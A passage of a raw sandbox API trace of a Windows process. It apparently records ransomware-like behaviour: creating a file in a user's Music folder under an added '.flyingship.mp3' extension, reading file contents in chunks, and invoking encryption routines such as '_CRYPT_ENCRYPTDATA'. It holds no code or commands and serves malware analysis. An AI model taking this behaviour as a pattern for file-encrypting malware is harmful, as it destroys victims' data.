RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0185.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0185.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0185.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0185.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0185.878] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0185.878] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0185.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0185.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0185.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0185.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0185.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0185.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0185.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0185.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0185.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0185.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0185.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0185.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0185.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0185.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0185.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0185.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0185.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0185.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0185.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0185.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0185.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0185.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0185.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0185.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe0) returned 0x8feba8 [0185.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0185.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0185.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0185.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6d90 [0185.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0185.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0185.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0185.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0185.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0185.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0185.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0185.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0185.879] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l")) returned 0x10 [0185.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0185.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6d90 | out: hHeap=0x8a0000) returned 1 [0185.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0185.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0185.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0185.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0185.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0185.880] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.flyingship.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\o8lnb5uj.flyingship.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0185.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0185.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0185.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0185.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0185.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0185.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0185.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0185.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0185.881] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0185.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0185.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0185.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0185.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0185.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0185.881] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0185.881] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0185.881] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0185.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0185.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0185.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0185.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0185.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0185.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0185.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0185.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0185.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0185.882] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0185.882] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0185.885] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x227f, lpOverlapped=0x0) returned 1 [0185.886] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0185.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0185.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0185.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1227f) returned 0xbea018 [0185.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0185.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0185.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0185.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0185.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0185.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0185.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1227f) returned 0xbfc2a0 [0185.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0185.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.888] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0185.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0185.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1227f) returned 0xbea018 [0185.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0185.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0185.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0185.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.899] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0185.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0185.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0185.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0185.899] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0185.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0185.899] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0185.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0185.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0185.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1227f) returned 0xbea018 [0185.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0185.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2768 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0185.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0185.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3a8 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0185.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1227f) returned 0xa5f008 [0185.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0185.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0185.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0185.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0185.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0185.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0185.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0185.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0185.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0185.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0185.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0185.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0185.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0185.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0185.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0185.903] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0185.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0185.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0185.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0185.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0185.903] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0185.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0185.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0185.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0185.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0185.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0185.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0185.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0185.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0185.903] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0185.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0185.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0185.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0185.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2888 [0185.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0185.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0185.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0185.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd738 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0185.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0185.904] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0185.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) 